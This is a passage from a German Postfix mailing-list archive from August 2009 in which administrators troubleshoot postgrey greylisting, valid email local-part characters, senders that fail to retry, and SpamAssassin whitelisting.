Geschaeftsfuehrung: Thomas Birnthaler / +49 171-3047465 / tb at ostc.de / pgp 0xFEE7EB4C Hermann Gottschalk / +49 173-3600680 / hg at ostc.de / pgp 0x0B2D8EEA -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From F.Guenther at t-systems.com Fri Aug 14 09:58:38 2009 From: F.Guenther at t-systems.com (F.Guenther at t-systems.com) Date: Fri, 14 Aug 2009 09:58:38 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <20090810114919.GA29820@mail.incertum.net> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de> <20090810114919.GA29820@mail.incertum.net> Message-ID: <410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de> Hallo ich arbeite mich so langsam durch das Buch. Ich habe einen großen Vorteil: "Wichtiges" kann ich ((vorsichtig)) an meinem laufenden Server testen und ALLES an meinem "Neuen". Dieser wird jedoch nicht so mit Emails bombardiert. Ich nehme immer die amavis-new testmails. Der "Neue" rejectet Virusmails; taggt Spam und läßt alles andere durch. Jetzt bin ich bei Greylistingangekommen. Mein System ist ubuntu8.04. Die Installation nimmt Port 60000 folgendes ist konfiguriert: /etc/default/postgrey POSTGREY_OPTS="--inet=127.0.0.1:60000" /etc/postfix/main.cf (postconf -n) ... smtpd_recipient_restrictions = reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unknown_recipient_domain, permit_mynetworks, permit_sasl_authenticated, reject_rbl_client zen.spamhaus.org, reject_rbl_client ix.dnsbl.manitu.net,reject_rbl_client bl.spamcop.net, reject_rbl_client dnsbl.njabl.org, reject_rbl_client list.dsbl.org, reject_rhsbl_client blackhole.securitysage.com, check_policy_service inet:localhost:60000, reject_unauth_destination, permit ... Lsof -i 60000 -> postgrey 9256 postgrey 5u IPv4 25072 TCP localhost.localdomain:60000 (LISTEN) /var/run/postgr* -> 25071 4 -rw-r--r-- 1 postgrey postgrey 5 2009-08-14 09:36 postgrey.pid ABER: Restarting postfix greylisting daemon: postgrey führt zu: Aug 14 09:36:38 mail postgrey[8200]: 2009/08/14-09:36:38 Server closing! Aug 14 09:36:38 mail postgrey[8200]: Couldn't unlink "/var/run/postgrey.pid" [Permission denied] Aug 14 09:36:39 mail postgrey[9256]: Process Backgrounded Aug 14 09:36:39 mail postgrey[9256]: 2009/08/14-09:36:39 postgrey (type Net::Server::Multiplex) starting! pid(9256) Aug 14 09:36:39 mail postgrey[9256]: Binding to TCP port 60000 on host 127.0.0.1 Aug 14 09:36:39 mail postgrey[9256]: Setting gid to "120 120" Aug 14 09:36:39 mail postgrey[9256]: Setting uid to "109" Jetzt auch die Frage: 1. Im Internet habe ich diesen Fehler oft... aber keine Lösung gefunden, vielleicht kann jemand helfen? 2. Im mail- und syslog kann ich keine Einträge von postgrey finden, auch nicht wenn ich meine o.g. testmails verwende. Auch wenn ich zum start /usr/sbin/postgrey -v -d --inet localhost:60000 benutze? Postgrey scheint nicht zu tun? Mit freundlichen Grüßen Frank From driessen at fblan.de Fri Aug 14 10:17:05 2009 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 14 Aug 2009 10:17:05 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de><20090810114919.GA29820@mail.incertum.net> <410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de> Message-ID: <000301ca1cb7$9becc9e0$0565a8c0@uwe> > -----Original Message----- > From: postfixbuch-users-bounces at listen.jpberlin.de [mailto:postfixbuch-users- > bounces at listen.jpberlin.de] On Behalf Of F.Guenther at t-systems.com > Sent: Friday, August 14, 2009 9:59 AM > To: postfixbuch-users at listen.jpberlin.de > Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey > > Hallo ich arbeite mich so langsam durch das Buch. > Ich habe einen großen Vorteil: "Wichtiges" kann ich ((vorsichtig)) an meinem laufenden > Server testen und ALLES an meinem "Neuen". > Dieser wird jedoch nicht so mit Emails bombardiert. Ich nehme immer die amavis-new > testmails. > > Der "Neue" rejectet Virusmails; taggt Spam und läßt alles andere durch. > Jetzt bin ich bei Greylistingangekommen. Mein System ist ubuntu8.04. > Die Installation nimmt Port 60000 folgendes ist konfiguriert: > > /etc/default/postgrey > POSTGREY_OPTS="--inet=127.0.0.1:60000" > > /etc/postfix/main.cf (postconf -n) > > ... > smtpd_recipient_restrictions = reject_non_fqdn_sender, reject_non_fqdn_recipient, > reject_unknown_sender_domain, reject_unknown_recipient_domain, > permit_mynetworks, permit_sasl_authenticated, reject_rbl_client > zen.spamhaus.org, reject_rbl_client ix.dnsbl.manitu.net,reject_rbl_client > bl.spamcop.net, reject_rbl_client dnsbl.njabl.org, reject_rbl_client > list.dsbl.org, reject_rhsbl_client blackhole.securitysage.com, > check_policy_service inet:localhost:60000, reject_unauth_destination, > permit > ... > Versuchs mal mit check_policy_service inet:127.0.0.1:60000 > > Jetzt auch die Frage: > 1. Im Internet habe ich diesen Fehler oft... aber keine Lösung gefunden, vielleicht kann > jemand helfen? > 2. Im mail- und syslog kann ich keine Einträge von postgrey finden, auch nicht wenn ich > meine o.g. testmails verwende. Auch wenn ich zum start /usr/sbin/postgrey -v -d --inet > localhost:60000 benutze? Postgrey scheint nicht zu tun? > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From lists at puersten.de Fri Aug 14 10:28:11 2009 From: lists at puersten.de (=?ISO-8859-15?Q?Oliver_P=FCrsten?=) Date: Fri, 14 Aug 2009 10:28:11 +0200 Subject: [Postfixbuch-users] Zeichen im local Part einer Email Message-ID: <4A85201B.6020109@puersten.de> Hallo Zusammen, ich habe eine Frage bezüglich der erlaubten Zeichen innerhalb des local Part bzw. zusätzlich auch bezüglicher der Zeichen die am Anfang erlaub sind. Mein Recherche hat hierzu bis dato ergeben das die folgenden Zeichen erlaubt sind: A-Z in Groß- und Kleinschreibung Zahlen von 0-9 . # { | } ! $ % = ? ^ _ ` ~ & ' * + - / Zudem soll . - am Anfang nicht erlaub sein. Kann mir da jemand was zu sagen, speziell zu nicht erlaubten Zeichen am Anfang und am Ende des local Part? Unser Mailsystem schmeiß als Fehlermeldung an einen Empfänger mit - am Anfang und am Ende des local Part (z.B. -test- at domain.tld) die folgenden Fehlermeldung: invalid recipient syntax Besten Dank ! Gruß Oliver From F.Guenther at t-systems.com Fri Aug 14 10:37:15 2009 From: F.Guenther at t-systems.com (F.Guenther at t-systems.com) Date: Fri, 14 Aug 2009 10:37:15 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <000301ca1cb7$9becc9e0$0565a8c0@uwe> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de><20090810114919.GA29820@mail.incertum.net><410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de> <000301ca1cb7$9becc9e0$0565a8c0@uwe> Message-ID: <410895869A205548A19FE0746861331C07E40F1F@S4DE9JSAAIG.ost.t-com.de> > Die Installation nimmt Port 60000 folgendes ist konfiguriert: > > /etc/default/postgrey > POSTGREY_OPTS="--inet=127.0.0.1:60000" > > /etc/postfix/main.cf (postconf -n) > > ... > smtpd_recipient_restrictions = reject_non_fqdn_sender, reject_non_fqdn_recipient, > reject_unknown_sender_domain, reject_unknown_recipient_domain, > permit_mynetworks, permit_sasl_authenticated, reject_rbl_client > zen.spamhaus.org, reject_rbl_client ix.dnsbl.manitu.net,reject_rbl_client > bl.spamcop.net, reject_rbl_client dnsbl.njabl.org, reject_rbl_client > list.dsbl.org, reject_rhsbl_client blackhole.securitysage.com, > check_policy_service inet:localhost:60000, reject_unauth_destination, > permit > ... > Versuchs mal mit check_policy_service inet:127.0.0.1:60000 ist kein Unterschied Frank > > Jetzt auch die Frage: > 1. Im Internet habe ich diesen Fehler oft... aber keine Lösung > gefunden, vielleicht kann jemand helfen? > 2. Im mail- und syslog kann ich keine Einträge von postgrey finden, > auch nicht wenn ich meine o.g. testmails verwende. Auch wenn ich zum > start /usr/sbin/postgrey -v -d --inet localhost:60000 benutze? Postgrey scheint nicht zu tun? > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listen.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From driessen at fblan.de Fri Aug 14 10:57:03 2009 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 14 Aug 2009 10:57:03 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <410895869A205548A19FE0746861331C07E40F1F@S4DE9JSAAIG.ost.t-com.de> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de><20090810114919.GA29820@mail.incertum.net><410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de><000301ca1cb7$9becc9e0$0565a8c0@uwe> <410895869A205548A19FE0746861331C07E40F1F@S4DE9JSAAIG.ost.t-com.de> Message-ID: <000401ca1cbd$3158cba0$0565a8c0@uwe> On Behalf Of F.Guenther at t-systems.com > > > Die Installation nimmt Port 60000 folgendes ist konfiguriert: > > > > /etc/default/postgrey > > POSTGREY_OPTS="--inet=127.0.0.1:60000" POSTGREY_OPTS="--inet=127.0.0.1:60000 --greylist-action=450" POSTGREY_TEXT="Sorry for the silly things, come later thanks, you have to pay 20 cent for your Mail" > > > > /etc/postfix/main.cf (postconf -n) > > > > ... > > smtpd_recipient_restrictions = reject_non_fqdn_sender, > reject_non_fqdn_recipient, > > reject_unknown_sender_domain, reject_unknown_recipient_domain, > > permit_mynetworks, permit_sasl_authenticated, reject_rbl_client > > zen.spamhaus.org, reject_rbl_client ix.dnsbl.manitu.net,reject_rbl_client > > bl.spamcop.net, reject_rbl_client dnsbl.njabl.org, reject_rbl_client > > list.dsbl.org, reject_rhsbl_client blackhole.securitysage.com, > > check_policy_service inet:localhost:60000, reject_unauth_destination, > > permit > > ... > > > > Versuchs mal mit > > check_policy_service inet:127.0.0.1:60000 ist kein Unterschied Frank > > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From Ralf.Hildebrandt at charite.de Fri Aug 14 10:59:38 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Fri, 14 Aug 2009 10:59:38 +0200 Subject: [Postfixbuch-users] Zeichen im local Part einer Email In-Reply-To: <4A85201B.6020109@puersten.de> References: <4A85201B.6020109@puersten.de> Message-ID: <20090814085938.GN24130@charite.de> * Oliver Pürsten : > Zudem soll . - am Anfang nicht erlaub sein. Nö, das ist schon erlaubt > Unser Mailsystem schmeiß als Fehlermeldung an einen Empfänger mit - am Anfang > und am Ende des local Part (z.B. -test- at domain.tld) die folgenden Fehlermeldung: > > invalid recipient syntax allow_min_user = yes -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From driessen at fblan.de Fri Aug 14 11:03:58 2009 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 14 Aug 2009 11:03:58 +0200 Subject: [Postfixbuch-users] Zeichen im local Part einer Email In-Reply-To: <4A85201B.6020109@puersten.de> References: <4A85201B.6020109@puersten.de> Message-ID: <000501ca1cbe$288c2e80$0565a8c0@uwe> On Behalf Of Oliver Pürsten > Hallo Zusammen, > > ich habe eine Frage bezüglich der erlaubten Zeichen innerhalb des local Part > bzw. zusätzlich auch bezüglicher der Zeichen die am Anfang erlaub sind. > > Mein Recherche hat hierzu bis dato ergeben das die folgenden Zeichen erlaubt > sind: > > A-Z in Groß- und Kleinschreibung > Zahlen von 0-9 > . # { | } ! $ % = ? ^ _ ` ~ & ' * + - / > > Zudem soll . - am Anfang nicht erlaub sein. ./localpart könnte als Befehl interpretiert werden -localpart als Option > > Kann mir da jemand was zu sagen, speziell zu nicht erlaubten Zeichen am Anfang > und am Ende des local Part? > > Unser Mailsystem schmeiß als Fehlermeldung an einen Empfänger mit - am Anfang > und am Ende des local Part (z.B. -test- at domain.tld) die folgenden Fehlermeldung: > > invalid recipient syntax Jap macht meiner auch und was stört dich daran? Ein System das solche Mailadressen bei der Anlage zulässt mag ich per se nicht. Localpart sollte am Anfang und am Ende entweder mit Ziffern oder Buchstaben abschließen. Das verstehen alle Systeme weltweit. Ich hab mir den Spaß gemacht und ein paar dieser Mails zur Analyse angenommen....(es war nichts dabei was zu lesen den Aufwand gerechtfertigt hätte). > > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From christian.flothmann at xabbuh.de Fri Aug 14 10:33:17 2009 From: christian.flothmann at xabbuh.de (Christian Flothmann) Date: Fri, 14 Aug 2009 10:33:17 +0200 (CEST) Subject: [Postfixbuch-users] Zeichen im local Part einer Email In-Reply-To: <4A85201B.6020109@puersten.de> References: <4A85201B.6020109@puersten.de> Message-ID: <57228.85.8.70.161.1250238797.squirrel@www.violetcrew.de> Hallo, > Unser Mailsystem schmeiß als Fehlermeldung an einen Empfänger mit - am > Anfang > und am Ende des local Part (z.B. -test- at domain.tld) die folgenden > Fehlermeldung: > > invalid recipient syntax http://www.postfix.org/postconf.5.html#allow_min_user Gruß From lists at puersten.de Fri Aug 14 11:21:54 2009 From: lists at puersten.de (=?ISO-8859-1?Q?Oliver_P=FCrsten?=) Date: Fri, 14 Aug 2009 11:21:54 +0200 Subject: [Postfixbuch-users] Zeichen im local Part einer Email In-Reply-To: <000501ca1cbe$288c2e80$0565a8c0@uwe> References: <4A85201B.6020109@puersten.de> <000501ca1cbe$288c2e80$0565a8c0@uwe> Message-ID: <4A852CB2.9030102@puersten.de> Uwe Driessen schrieb: > On Behalf Of Oliver Pürsten >> Hallo Zusammen, >> >> ich habe eine Frage bezüglich der erlaubten Zeichen innerhalb des local Part >> bzw. zusätzlich auch bezüglicher der Zeichen die am Anfang erlaub sind. >> >> Mein Recherche hat hierzu bis dato ergeben das die folgenden Zeichen erlaubt >> sind: >> >> A-Z in Groß- und Kleinschreibung >> Zahlen von 0-9 >> . # { | } ! $ % = ? ^ _ ` ~ & ' * + - / >> >> Zudem soll . - am Anfang nicht erlaub sein. > > ./localpart könnte als Befehl interpretiert werden > -localpart als Option > >> Kann mir da jemand was zu sagen, speziell zu nicht erlaubten Zeichen am Anfang >> und am Ende des local Part? >> >> Unser Mailsystem schmeiß als Fehlermeldung an einen Empfänger mit - am Anfang >> und am Ende des local Part (z.B. -test- at domain.tld) die folgenden Fehlermeldung: >> >> invalid recipient syntax > > Jap macht meiner auch und was stört dich daran? Ein System das solche Mailadressen bei der > Anlage zulässt mag ich per se nicht. Localpart sollte am Anfang und am Ende entweder mit > Ziffern oder Buchstaben abschließen. Das verstehen alle Systeme weltweit. > > Ich hab mir den Spaß gemacht und ein paar dieser Mails zur Analyse angenommen....(es war > nichts dabei was zu lesen den Aufwand gerechtfertigt hätte). > >> > > > Mit freundlichen Grüßen > > Drießen > Ein Kunde von uns wollte eine Email an eine Emailadresse schicken die mit "-" beginnt und das hat dann nicht geklappt, daher meine Frage. Aber die Liste mit den erlaubten Zeichen stimmt soweit? Wie haltet Ihr das denn mit den Emailadressen bei Euch, erlaubt Ihr Euren Usern/Kunden Adressen mit den gültigen Zeichen anzulegen oder schränkt Ihr das noch ein das z.B. am Anfang und am Ende nur ein Zahl oder ein Buchstabe stehen darf? Gruß Oliver From F.Guenther at t-systems.com Fri Aug 14 11:22:45 2009 From: F.Guenther at t-systems.com (F.Guenther at t-systems.com) Date: Fri, 14 Aug 2009 11:22:45 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <000401ca1cbd$3158cba0$0565a8c0@uwe> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de><20090810114919.GA29820@mail.incertum.net><410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de><000301ca1cb7$9becc9e0$0565a8c0@uwe><410895869A205548A19FE0746861331C07E40F1F@S4DE9JSAAIG.ost.t-com.de> <000401ca1cbd$3158cba0$0565a8c0@uwe> Message-ID: <410895869A205548A19FE0746861331C07E40F7B@S4DE9JSAAIG.ost.t-com.de> -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listen.jpberlin.de [mailto:postfixbuch-users-bounces at listen.jpberlin.de] Im Auftrag von Uwe Driessen Gesendet: Freitag, 14. August 2009 10:57 An: 'Eine Diskussionsliste rund um das Postfix-Buch von Peer Heinlein.' Betreff: Re: [Postfixbuch-users] Postfixbuch bis S.226 postgrey On Behalf Of F.Guenther at t-systems.com > > > Die Installation nimmt Port 60000 folgendes ist konfiguriert: > > > > /etc/default/postgrey > > POSTGREY_OPTS="--inet=127.0.0.1:60000" POSTGREY_OPTS="--inet=127.0.0.1:60000 --greylist-action=450" POSTGREY_TEXT="Sorry for the silly things, come later thanks, you have to pay 20 cent for your Mail" Das hab ich auch probiert. Ich denke aber das Problem muß man tiefer greifen. Denn dieses komische abtauchen von postgrey nach dem beenden bzw. seine Beschwerde über .. postgrey[10376]: 2009/08/14-11:03:19 Server closing! postgrey[10376]: Couldn't unlink "/var/run/postgrey.pid" [Permission denied] postgrey[11405]: Process Backgrounded postgrey[11405]: 2009/08/14-11:03:21 postgrey (type Net::Server::Multiplex) starting! pid(11405) postgrey[11405]: Binding to TCP port 60000 on host 127.0.0.1 postgrey[11405]: Setting gid to "120 120" postgrey[11405]: Setting uid to "109" amavis[11111]: SpamControl: init_pre_fork done .. Die Rechte und die Funktion überhaupt sind das Problem...............Frank ;-( > > > > /etc/postfix/main.cf (postconf -n) > > > > ... > > smtpd_recipient_restrictions = reject_non_fqdn_sender, > reject_non_fqdn_recipient, > > reject_unknown_sender_domain, reject_unknown_recipient_domain, > > permit_mynetworks, permit_sasl_authenticated, reject_rbl_client > > zen.spamhaus.org, reject_rbl_client ix.dnsbl.manitu.net,reject_rbl_client > > bl.spamcop.net, reject_rbl_client dnsbl.njabl.org, reject_rbl_client > > list.dsbl.org, reject_rhsbl_client blackhole.securitysage.com, > > check_policy_service inet:localhost:60000, reject_unauth_destination, > > permit > > ... > > > > Versuchs mal mit > > check_policy_service inet:127.0.0.1:60000 ist kein Unterschied Frank > > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listen.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From S.Fietzek at hasec.de Fri Aug 14 11:31:21 2009 From: S.Fietzek at hasec.de (Stephan Fietzek) Date: Fri, 14 Aug 2009 11:31:21 +0200 Subject: [Postfixbuch-users] Was macht man totalen Standardverweigerern? Message-ID: <005301ca1cc1$fc37ed70$f4a7c850$@Fietzek@hasec.de> Hallo zusammen, gestern habe ich meinen ersten selbst konfigurierten Postfix-Server in Betrieb genommen. Dank des hervorragenden Buchs und dem Archiv dieser Liste läuft alles soweit stabil und zuverlässig. Allerding bin ich inzwischen auf den ersten „Standardverweigerer“ gestoßen und wollte die erfahrenen Admins hier mal fragen, wie man mit solchen Buben am besten umgeht. Hier kurz die Logausschnitte (Namen entfernt): Aug 13 11:32:17 tux postfix/smtpd[25794]: connect from exprod5og111.obsmtp.com[64.18.0.22] Aug 13 11:32:18 tux postgrey[13854]: action=greylist, reason=new, client_name=exprod5og111.obsmtp.com, client_address=64.18.0.22, sender=XXX at de.TTIInc.com, recipient=AAA at HASEC.DE Aug 13 11:32:21 tux postfix/smtpd[25794]: NOQUEUE: reject: RCPT from exprod5og111.obsmtp.com[64.18.0.22]: 450 4.2.0 : Recipient address rejected: Greylisted for 300 seconds; from= to= proto=SMTP helo= Aug 13 11:32:21 tux postfix/smtpd[25794]: disconnect from exprod5og111.obsmtp.com[64.18.0.22] Aug 13 13:15:33 tux postfix/smtpd[26272]: connect from exprod5og114.obsmtp.com[64.18.0.28] Aug 13 13:15:36 tux postgrey[13854]: action=greylist, reason=new, client_name=exprod5og114.obsmtp.com, client_address=64.18.0.28, sender=XXX at de.TTIInc.com, recipient=BBB at hasec.de Aug 13 13:15:36 tux postfix/smtpd[26272]: NOQUEUE: reject: RCPT from exprod5og114.obsmtp.com[64.18.0.28]: 450 4.2.0 : Recipient address rejected: Greylisted for 300 seconds; from= to= proto=SMTP helo= Aug 13 13:15:37 tux postfix/smtpd[26272]: disconnect from exprod5og114.obsmtp.com[64.18.0.28] Wie man sieht, sollten hier zwei Mails an unsere Mitarbeiter zugestellt werden. Diese wurden gegreylistet, aber leider unternehmen die Server anscheinend keine neuen Zustellversuche. Da will wohl jemand nicht, dass seine Mails ankommen. Die Domain der absendenden Server lässt auch noch darauf schließen, dass man die Dienste eines amerikanischen Providers nutzt. Dieser scheint aber nicht generell dieses Problem zu haben. Mails von bspw. exprod7ogxxx.obsmtp.com von anderen Geschäftpartnern gehen mit greylisting problemlos um. Ich dachte mir, schnell 'ne Mail an postmaster at de.TTIInc.com. Rejected, Adresse nicht vorhenden. postmaster at TTIInc.com ebenso. Und das bei einem internationalen Unternehmen. Mein Problem: Was soll ich nun machen? Whitelisten der Absender-IPs ist schwer. Ich weiß ja nicht von wie vielen unterschiedlichen Servern die senden. Whitelisten nach Absender-Adressen: eklig. Wie geht ihr mit solchen Totalverweigerern um? Mit freundlichen Grüßen Best Regards Stephan Fietzek IT-Administration HASEC-Elektronik GmbH Industriestr. 12 Tel. +49 (36929) 6400-215 99846 Seebach Fax +49 (36929) 6400-219 S.Fietzek at hasec.de http://www.hasec.de Geschäftsführer: Marco Zimmermann HRB 400909 Amtsgericht Jena From Ralf.Hildebrandt at charite.de Fri Aug 14 11:36:14 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Fri, 14 Aug 2009 11:36:14 +0200 Subject: [Postfixbuch-users] Was macht man totalen Standardverweigerern? In-Reply-To: <005301ca1cc1$fc37ed70$f4a7c850$@Fietzek@hasec.de> References: <005301ca1cc1$fc37ed70$f4a7c850$@Fietzek@hasec.de> Message-ID: <20090814093614.GS24130@charite.de> * Stephan Fietzek : > Hallo zusammen, > > gestern habe ich meinen ersten selbst konfigurierten Postfix-Server in > Betrieb genommen. Dank des hervorragenden Buchs und dem Archiv dieser Liste > läuft alles soweit stabil und zuverlässig. Allerding bin ich inzwischen auf > den ersten „Standardverweigerer“ gestoßen und wollte die erfahrenen Admins > hier mal fragen, wie man mit solchen Buben am besten umgeht. Deppen blacklisten, gut 'is > Ich dachte mir, schnell 'ne Mail an postmaster at de.TTIInc.com. Rejected, > Adresse nicht vorhenden. postmaster at TTIInc.com ebenso. Und das bei einem > internationalen Unternehmen. Tja. -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From driessen at fblan.de Fri Aug 14 11:50:08 2009 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 14 Aug 2009 11:50:08 +0200 Subject: [Postfixbuch-users] Was macht man totalen Standardverweigerern? In-Reply-To: <005301ca1cc1$fc37ed70$f4a7c850$@Fietzek@hasec.de> References: <005301ca1cc1$fc37ed70$f4a7c850$@Fietzek@hasec.de> Message-ID: <000601ca1cc4$9bcf6af0$0565a8c0@uwe> On Behalf Of Stephan Fietzek > > > Ich dachte mir, schnell 'ne Mail an postmaster at de.TTIInc.com. Rejected, > Adresse nicht vorhenden. postmaster at TTIInc.com ebenso. Und das bei einem > internationalen Unternehmen. Rfc-ignorant.org (war es glaube ich) > > Mein Problem: Was soll ich nun machen? Whitelisten der Absender-IPs ist > schwer. Ich weiß ja nicht von wie vielen unterschiedlichen Servern die > senden. Whitelisten nach Absender-Adressen: eklig. Nö Gott bewahre. Immer der Server der versendet ist dafür zuständig das eine Mail ankommt. Greylisting evtl. "selectiv" einbauen mit einer Restrition class Anleitung findest du hier in der Liste des öfteren. > > Wie geht ihr mit solchen Totalverweigerern um? > Nicht mein Problem wenn ein Server nicht zustellt dann stellt er eben nicht zu. Hat meine Kiste ein echtes temp Problem dann würde das gleiche passieren. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From driessen at fblan.de Fri Aug 14 11:57:36 2009 From: driessen at fblan.de (Uwe Driessen) Date: Fri, 14 Aug 2009 11:57:36 +0200 Subject: [Postfixbuch-users] Postfixbuch bis S.226 postgrey In-Reply-To: <410895869A205548A19FE0746861331C07E40F7B@S4DE9JSAAIG.ost.t-com.de> References: <410895869A205548A19FE0746861331C07D9B009@S4DE9JSAAIG.ost.t-com.de><20090810114919.GA29820@mail.incertum.net><410895869A205548A19FE0746861331C07E40ED4@S4DE9JSAAIG.ost.t-com.de><000301ca1cb7$9becc9e0$0565a8c0@uwe><410895869A205548A19FE0746861331C07E40F1F@S4DE9JSAAIG.ost.t-com.de><000401ca1cbd$3158cba0$0565a8c0@uwe> <410895869A205548A19FE0746861331C07E40F7B@S4DE9JSAAIG.ost.t-com.de> Message-ID: <000701ca1cc5$a6ae5b60$0565a8c0@uwe> On Behalf Of F.Guenther at t-systems.com > Im Auftrag von Uwe Driessen > On Behalf Of F.Guenther at t-systems.com > > > > > Die Installation nimmt Port 60000 folgendes ist konfiguriert: > > > > > > /etc/default/postgrey > > > POSTGREY_OPTS="--inet=127.0.0.1:60000" > > > POSTGREY_OPTS="--inet=127.0.0.1:60000 --greylist-action=450" > POSTGREY_TEXT="Sorry for the silly things, come later thanks, you have to pay 20 cent > for your Mail" > Das hab ich auch probiert. Ich denke aber das Problem muß man tiefer greifen. Denn > dieses komische abtauchen von postgrey nach dem beenden bzw. seine Beschwerde über .. > postgrey[10376]: 2009/08/14-11:03:19 Server closing! > postgrey[10376]: Couldn't unlink "/var/run/postgrey.pid" [Permission denied] Evtl. noch reste von irgendwas oder Datei irgendwann mal mit falschen rechten angelegt? Postgrey stoppen bzw. alle Task davon killen, Datei löschen --greylist-action=450 in der default/postgrey einfügen -rw-r--r-- 1 postgrey postgrey 5 2009-08-14 01:59 postgrey.pid Ps aux|grep postgrey postgrey 4080 0.0 0.2 11604 8556 ? Ss 01:59 0:01 /usr/sbin/postgrey --pidfile=/var/run/postgrey.pid --daemonize --inet=127.0.0.1:60000 --greylist-action=450 --greylist-text=Sorry for the silly things, come later thanks, you have to pay 20 cent for your Mail > > > /etc/postfix/main.cf (postconf -n) > > > > > > ... > > > smtpd_recipient_restrictions = reject_non_fqdn_sender, > > reject_non_fqdn_recipient, > > > reject_unknown_sender_domain, reject_unknown_recipient_domain, > > > permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination, #eigentlich hierher check_policy_service inet:127.0.0.1:60000 > > > reject_rbl_client > > > zen.spamhaus.org, reject_rbl_client ix.dnsbl.manitu.net,reject_rbl_client > > > bl.spamcop.net, reject_rbl_client dnsbl.njabl.org, reject_rbl_client > > > list.dsbl.org, reject_rhsbl_client blackhole.securitysage.com, > > > permit Das Permit kannste dir sparen wer alle überlebt hat wird angenommen > > > ... > > > > > > > Versuchs mal mit > > > > check_policy_service inet:127.0.0.1:60000 ist kein Unterschied Frank > > > > > > > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From christian at roessner-net.com Fri Aug 14 12:04:07 2009 From: christian at roessner-net.com (Christian Roessner) Date: Fri, 14 Aug 2009 12:04:07 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?OT=3A_LDAPfilter_f=FCr_SpamAss?= =?iso-8859-1?q?assin?= Message-ID: <1250244247.31792.4.camel@desktop> Hallo, ich hätte da mal eine Spezialfrage :-) Ich nutze Amavis als Proxy in Postfix. Im SpamAssassin-Part habe ich ein paar Whitelistings drin: whitelist_from_rcvd amavis-user-bounces at lists.sourceforge.net lists.sourceforge.net whitelist_from_rcvd mailzu-users-bounces at lists.sourceforge.net lists.sourceforge.net whitelist_from_rcvd nfsen-discuss-bounces at lists.sourceforge.net lists.sourceforge.net whitelist_from_rcvd openldap-software-bounces*@openldap.org boole.openldap.org whitelist_from_rcvd singles-bounces at lists.roessner-net.de mx0.roessner-net.de whitelist_from_rcvd postfixbuch-users-bounces at listen.jpberlin.de ilpostino.jpberlin.de whitelist_from_rcvd postfix-users-bounces at de.postfix.org postfix.charite.de whitelist_from_rcvd mysql-de-bounces at lists.4t2.com lists.4t2.com whitelist_from_rcvd sanesecurity-mirrors-bounces at lists.ntua.gr lists.ntua.gr whitelist_from_rcvd *@vger.kernel.org vger.kernel.org whitelist_from_rcvd 